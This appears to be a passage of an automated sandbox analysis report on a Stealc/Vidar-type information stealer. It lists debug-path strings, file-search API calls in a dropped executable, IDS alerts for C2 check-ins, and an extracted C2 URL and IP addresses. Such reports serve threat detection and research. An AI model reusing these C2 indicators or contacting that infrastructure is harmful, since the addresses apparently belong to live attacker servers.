Source:	Binary string: C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: mozglue.pdb source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243252016.0000021717B20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb@=Z= L=_CorDllMainmscoree.dll source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 00000003.00000002.2170329966.000000006C827000.00000002.00000001.01000000.0000000A.sdmp, run.exe, 00000016.00000002.2733109861.000000006C7D7000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: EntitlementDefinitions.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296334210.0000021732000000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_en-us\obj\Release\Locale_en-us.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296044980.0000021731FB0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdbSHA256M$ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318876041.0000021738130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdbjD source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3243326923.0000021717B30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3297147594.00000217321C0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3289012458.0000021731C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.000002172935C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3319355291.0000021738BD0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.00000217293BE000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3298881249.0000021732270000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: P[<_C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: I[L<C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\sedoh\56\sizagabucusa xayipo\8-rinuhololoz\nuzunum dor.pdb source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000000.2018347583.0000000000412000.00000002.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0041D8B1 FindFirstFileExA,	0_2_0041D8B1
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: 0_2_0368DB18 FindFirstFileExA,	0_2_0368DB18
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_00412570
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040D1C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_004015C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	2_2_00411650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B610
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_0040DB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00411B80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040D540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	2_2_004121F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C72261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	3_2_6C72261E

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Jump to behavior
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2856233 ETPRO TROJAN Win32/Unknown Loader Related Activity (GET) 192.168.2.5:49705 -> 185.172.128.90:80
Source: Traffic	Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic	Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic	Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 185.172.128.150:80 -> 192.168.2.5:49708
Source: Traffic	Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.5:49708 -> 185.172.128.150:80
Source: Traffic	Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 185.172.128.150:80 -> 192.168.2.5:49708

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: Malware configuration extractor	URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 91.215.85.66 ports 9000,1,4,5,6,7,15647

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 9000
